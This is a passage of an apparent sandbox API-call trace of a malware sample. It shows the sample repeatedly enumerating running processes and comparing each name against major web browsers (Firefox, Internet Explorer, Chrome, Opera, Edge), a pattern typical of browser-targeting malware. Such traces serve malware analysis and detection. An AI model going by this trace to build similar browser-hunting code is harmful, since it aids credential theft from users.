(lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.878] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.878] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.878] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.878] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.878] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0207.879] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0207.879] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0207.879] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0207.879] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0207.879] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.879] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.879] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0207.879] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0207.879] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0207.879] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0207.880] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.880] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.880] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0207.880] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0207.880] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0207.880] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0207.880] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.880] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0207.881] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0207.881] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0207.881] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0207.881] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0207.881] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.881] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.881] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0207.881] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0207.881] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0207.881] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0207.881] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0207.881] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.882] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0207.882] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.883] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.883] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0207.883] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0207.883] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0207.883] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0207.883] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.883] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.884] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0207.884] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0207.884] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0207.884] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0207.884] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0207.884] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0207.884] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0207.884] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0207.884] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0207.884] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0207.884] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0207.884] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0207.885] CloseHandle (hObject=0xe8) returned 1 [0207.885] Sleep (dwMilliseconds=0x3e8) [0208.918] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0208.920] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.921] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0208.921] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0208.921] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0208.921] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0208.921] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0208.921] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.921] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0208.921] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0208.921] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0208.921] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0208.921] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0208.921] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.922] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0208.922] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0208.922] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0208.922] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0208.922] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.922] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.923] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0208.923] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0208.923] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0208.923] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0208.923] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.923] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.923] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0208.923] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0208.923] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0208.923] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0208.923] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.923] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.924] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0208.924] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0208.924] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0208.924] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0208.924] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.924] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.924] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0208.924] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0208.924] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0208.924] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0208.924] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.924] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.925] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0208.925] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0208.925] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0208.925] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0208.925] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.925] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.926] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0208.926] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0208.926] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0208.926] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0208.926] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.926] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0208.926] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0208.926] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0208.926] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0208.926] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0208.926] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.926] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.927] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.927] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.927] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.928] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.928] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.928] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.928] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.928] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.928] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.929] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.929] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.929] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.930] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0208.930] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0208.930] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0208.930] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0208.930] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.930] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.930] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.930] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.930] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.930] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.930] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.930] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.931] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.931] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.931] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.931] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.931] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.932] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0208.932] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0208.932] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0208.932] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0208.932] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.932] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0208.932] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0208.932] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0208.932] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0208.932] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.933] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0208.933] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0208.933] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0208.933] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0208.933] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.933] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0208.933] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0208.933] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0208.933] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0208.933] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0208.934] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0208.934] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0208.934] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0208.934] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0208.934] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0208.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0208.935] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0208.935] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0208.935] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0208.935] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0208.935] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0208.935] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0208.935] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0208.935] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0208.935] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0208.935] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0208.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0208.936] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0208.936] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0208.936] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0208.936] lstrcmpiA 